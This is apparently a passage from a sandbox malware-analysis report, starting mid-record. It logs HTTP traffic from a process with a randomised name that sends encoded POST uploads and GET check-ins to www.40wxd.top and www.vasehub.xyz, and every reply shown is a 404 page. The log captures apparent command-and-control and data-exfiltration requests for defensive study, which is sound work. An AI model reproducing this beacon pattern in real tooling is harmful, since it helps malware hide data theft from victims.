                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:02:21.861932993 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:21 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 254
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=p6P+FgoGiP/G4Ng2k4kydfL9CEjREuwmc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4guZJ1Pjn+I9YPEKQsPJSCqhxwn7206Dyyk=&oFA=_z5x9B5"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49881 | 206.119.82.134 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:27.519655943 CEST | 781 | OUT | POST /xqel/ HTTP/1.1
                                                                                                                                  Host: www.40wxd.top
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                                  Referer: http://www.40wxd.top/xqel/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Ascii: kf-HBx=itCjE0xz2xkITn0X3Rrot4bwHhb9YAuL0cX8ssprr/ca87QAEKog1W/WNQB3S7ekiVbTFXBFh+l2Fx84SG+RRBMzbA5gCzMe0LczXD3RFUWw/i630Hyez5MFFxq+An29T7+Tx1ZOply09oTwkwIq/d6Q50oPze3tgn+pTU03SvyoAr4N+tRQdBhE9kuOrWn26w==
Oct 24, 2024 08:02:28.449692011 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:28 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49893 | 206.119.82.134 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:30.067886114 CEST | 801 | OUT | POST /xqel/ HTTP/1.1
                                                                                                                                  Host: www.40wxd.top
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                                  Referer: http://www.40wxd.top/xqel/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Ascii: kf-HBx=itCjE0xz2xkISGEXk2Ho9ob/MBb9SgvC0cb8stt7oN4a9bAAWYAggW/WYgB2YbetiVfhFWtFh+h2FwM4T1WQTRMxRQ5mMTMe0LczXDzrFUOw/SK37GydtJMGSBq+XX2hT7+xxxQjpnK09sfwkhIlxd7VnEod+/2cu3b0R1MNNNmwBtpXvcwHPBF3gjn6mVa/h9oVZRVk4mb67rMv70aewew=
Oct 24, 2024 08:02:30.985322952 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:30 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49909 | 206.119.82.134 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:32.610771894 CEST | 10883 | OUT | POST /xqel/ HTTP/1.1
                                                                                                                                  Host: www.40wxd.top
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                                  Referer: http://www.40wxd.top/xqel/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Ascii: kf-HBx=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 [TRUNCATED]
Oct 24, 2024 08:02:33.537017107 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:33 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49922 | 206.119.82.134 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:35.155971050 CEST | 518 | OUT | GET /xqel/?kf-HBx=vvqDHEJ83RQMdUhh5kLoqoSDKB3hWQiq1sb91PtModI/1ZQDQosT/W6HQ09vXqzqrFP7Qh9498xTBzMpQmH7Kh5kUCFMd1INst0sGCzgDgfe+hjN7G6C4+s=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.40wxd.top
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Oct 24, 2024 08:02:36.082832098 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:35 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 548
                                                                                                                                  Connection: close
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49956 | 162.213.249.216 | 80 | 1376 | C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 08:02:41.300297022 CEST | 787 | OUT | POST /rhgo/ HTTP/1.1
                                                                                                                                  Host: www.vasehub.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.vasehub.xyz
                                                                                                                                  Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 55 71 62 48 6f 39 44 69 38 50 61 4b 2b 36 72 7a 56 67 33 54 71 6a 56 65 59 47 43 6e 46 52 50 61 4b 6c 56 42 7a 46 37 4a 64 7a 44 52 5a 46 67 51 51 6f 44 2f 63 54 71 52 67 4b 48 5a 64 46 58 6a 43 63 36 66 66 6f 31 51 35 42 75 6b 64 68 56 36 33 6c 44 7a 50 6a 52 74 47 58 6b 43 76 44 46 69 4b 38 72 56 69 64 64 6a 6c 57 64 31 31 4c 68 78 46 51 70 39 55 78 78 59 45 4c 48 42 6a 6b 37 4e 50 4c 39 44 63 6b 62 62 79 4f 4e 41 38 30 32 5a 43 79 38 6c 47 6e 54 75 4f 59 31 49 34 70 65 62 5a 50 31 6b 6d 71 43 4f 34 68 57 50 68 36 46 43 49 67 5a 37 72 51 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=4zYQckirOMbOUqbHo9Di8PaK+6rzVg3TqjVeYGCnFRPaKlVBzF7JdzDRZFgQQoD/cTqRgKHZdFXjCc6ffo1Q5BukdhV63lDzPjRtGXkCvDFiK8rViddjlWd11LhxFQp9UxxYELHBjk7NPL9DckbbyONA802ZCy8lGnTuOY1I4pebZP1kmqCO4hWPh6FCIgZ7rQ==
Timestamp: Oct 24, 2024 08:02:42.002927065 CEST | Bytes transferred: 533 | Direction: IN
HTTP/1.1 404 Not Found
Date: Thu, 24 Oct 2024 06:02:41 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID 14 | Source 192.168.2.4:49967 | Destination 162.213.249.216:80 | PID 1376 | Process C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:02:43.846467972 CEST | Bytes transferred: 807 | Direction: OUT
POST /rhgo/ HTTP/1.1
Host: www.vasehub.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.vasehub.xyz
Referer: http://www.vasehub.xyz/rhgo/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 46 36 4c 48 70 61 76 69 35 76 61 4a 78 61 72 7a 62 41 33 58 71 6a 52 65 59 48 32 52 46 6e 58 61 4b 45 6c 42 30 45 37 4a 59 7a 44 52 52 6c 67 52 65 49 44 68 63 54 58 6b 67 4f 48 5a 64 46 72 6a 43 65 69 66 66 62 64 50 32 78 75 6d 53 42 56 38 71 31 44 7a 50 6a 52 74 47 55 5a 6e 76 44 64 69 4b 4e 62 56 6a 2f 35 67 37 47 64 36 79 4c 68 78 53 41 70 78 55 78 77 39 45 49 44 72 6a 6d 44 4e 50 4b 4e 44 4e 52 76 59 37 4f 4e 43 34 30 33 4c 48 77 64 35 65 46 69 67 4a 62 52 72 77 4a 4b 45 59 4a 6b 2b 33 62 6a 5a 71 68 79 38 38 39 4d 32 46 6a 6b 79 77 61 47 77 75 33 6f 64 30 44 42 72 33 79 6e 49 4a 68 56 36 56 31 6b 3d
                                                                                                                                  Data Ascii: kf-HBx=4zYQckirOMbOF6LHpavi5vaJxarzbA3XqjReYH2RFnXaKElB0E7JYzDRRlgReIDhcTXkgOHZdFrjCeiffbdP2xumSBV8q1DzPjRtGUZnvDdiKNbVj/5g7Gd6yLhxSApxUxw9EIDrjmDNPKNDNRvY7ONC403LHwd5eFigJbRrwJKEYJk+3bjZqhy889M2FjkywaGwu3od0DBr3ynIJhV6V1k=
Timestamp: Oct 24, 2024 08:02:44.565080881 CEST | Bytes transferred: 533 | Direction: IN
HTTP/1.1 404 Not Found
Date: Thu, 24 Oct 2024 06:02:44 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID 15 | Source 192.168.2.4:49978 | Destination 162.213.249.216:80 | PID 1376 | Process C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:02:47.123435974 CEST | Bytes transferred: 10889 | Direction: OUT
POST /rhgo/ HTTP/1.1
Host: www.vasehub.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.vasehub.xyz
Referer: http://www.vasehub.xyz/rhgo/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10303
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 46 36 4c 48 70 61 76 69 35 76 61 4a 78 61 72 7a 62 41 33 58 71 6a 52 65 59 48 32 52 46 6e 76 61 4b 32 74 42 30 6e 6a 4a 62 7a 44 52 4f 56 67 55 65 49 43 6b 63 54 50 6f 67 4f 4c 76 64 41 76 6a 51 72 2b 66 5a 71 64 50 74 42 75 6d 51 42 56 35 33 6c 43 72 50 6a 41 6d 47 55 4a 6e 76 44 64 69 4b 4f 54 56 6b 74 64 67 35 47 64 31 31 4c 68 44 46 51 6f 6b 55 78 5a 41 45 4c 76 52 6a 56 4c 4e 4d 70 6c 44 65 48 44 59 6d 2b 4e 45 31 55 32 4f 48 77 52 51 65 46 75 61 4a 61 31 52 77 4c 57 45 5a 2b 4a 57 75 49 6a 6d 6f 53 79 7a 70 39 52 63 4b 68 55 38 38 5a 65 57 2f 33 30 6a 67 43 78 44 73 31 53 64 63 77 39 6c 4c 51 5a 71 56 73 36 43 54 39 55 64 69 6e 6e 47 39 59 4c 37 63 79 69 43 73 35 38 69 63 70 4c 72 69 44 37 70 58 67 4b 52 44 6a 70 69 6a 53 76 67 78 51 36 7a 36 67 7a 35 37 53 77 6d 4a 56 35 31 79 55 7a 44 55 6e 75 6f 39 68 4c 34 32 68 7a 5a 61 65 6c 66 37 58 79 4b 67 39 49 79 32 69 74 70 45 49 77 55 39 59 62 57 36 66 50 54 36 37 6b 66 37 43 66 37 63 61 78 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=4zYQckirOMbOF6LHpavi5vaJxarzbA3XqjReYH2RFnvaK2tB0njJbzDROVgUeICkcTPogOLvdAvjQr+fZqdPtBumQBV53lCrPjAmGUJnvDdiKOTVktdg5Gd11LhDFQokUxZAELvRjVLNMplDeHDYm+NE1U2OHwRQeFuaJa1RwLWEZ+JWuIjmoSyzp9RcKhU88ZeW/30jgCxDs1Sdcw9lLQZqVs6CT9UdinnG9YL7cyiCs58icpLriD7pXgKRDjpijSvgxQ6z6gz57SwmJV51yUzDUnuo9hL42hzZaelf7XyKg9Iy2itpEIwU9YbW6fPT67kf7Cf7cax8mE8I4PdfnXOX4Fhu44TdjlixBWAvziHIozz0A5BO7BnSHtIqt7hndKLnC/ZJGQk9Ugwf82IZinrfsBKw0MzJ2s0xV62CH6iGDvNvzfGLG5G4AGKbjZMunbt2Tbg4pYGhwOIIL44gdDhoh5WDpgFvSlZQEVdiRyyS1LS7J/ohnJcTVZ4LJEjwq2yiKH/5uDXy9HXE63JxIBmfM2oJavxVbdWrNCuZT/YbEkme84uanAjRe3ALQe6yWGUOzc28FRRPgNmVgKNu5dJuzBaz6mCZS0f1UIsuC1eMf9C1OMvopBCOvRC0oxZGqhJmhVhcLEKGeGeCTMUEFnTbQJw6w/LE4ivj8+DZ/sqNf35rMJhS6YKN+wEzvihRQEzVHECyz+s4R2eMEcPG3ANRBZs4WOUBJ1eNA3zInO720cJ1molLMzTozJyptiH+mOVI/90quZ6H101+zSgod49gEzA/aZaBCOl+2whhlH+HbdKHM2Ka5D8w8w67T1b3tXJW7VRNkWN1wWhg8UIlZp8PXUUIU/IglQKm4TeRl043CoAQCYOY9BfeZqYoo7XxwJvDNAFECSOxHQgjNPyxhHHntTaQVZj7HKpkRDNkZ8mLXA9usxD2QQy4sJx00nvSvuaMOeRb+qC5q1li7AtNKCixCElOuub6PaAbjnJTpqF4S [TRUNCATED]
Timestamp: Oct 24, 2024 08:02:47.805632114 CEST | Bytes transferred: 533 | Direction: IN
HTTP/1.1 404 Not Found
Date: Thu, 24 Oct 2024 06:02:47 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID 16 | Source 192.168.2.4:49994 | Destination 162.213.249.216:80 | PID 1376 | Process C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
Timestamp: Oct 24, 2024 08:02:49.668462038 CEST | Bytes transferred: 520 | Direction: OUT
GET /rhgo/?kf-HBx=1xwwfRv/EtrSMau8qPeCsOf3wKLyTBnoq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tBLzZBRYsir7YQhsB0BKwkYVMNCqueBTujA=&oFA=_z5x9B5 HTTP/1.1
Host: www.vasehub.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Timestamp: Oct 24, 2024 08:02:50.352365971 CEST | Bytes transferred: 548 | Direction: IN
HTTP/1.1 404 Not Found
Date: Thu, 24 Oct 2024 06:02:50 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

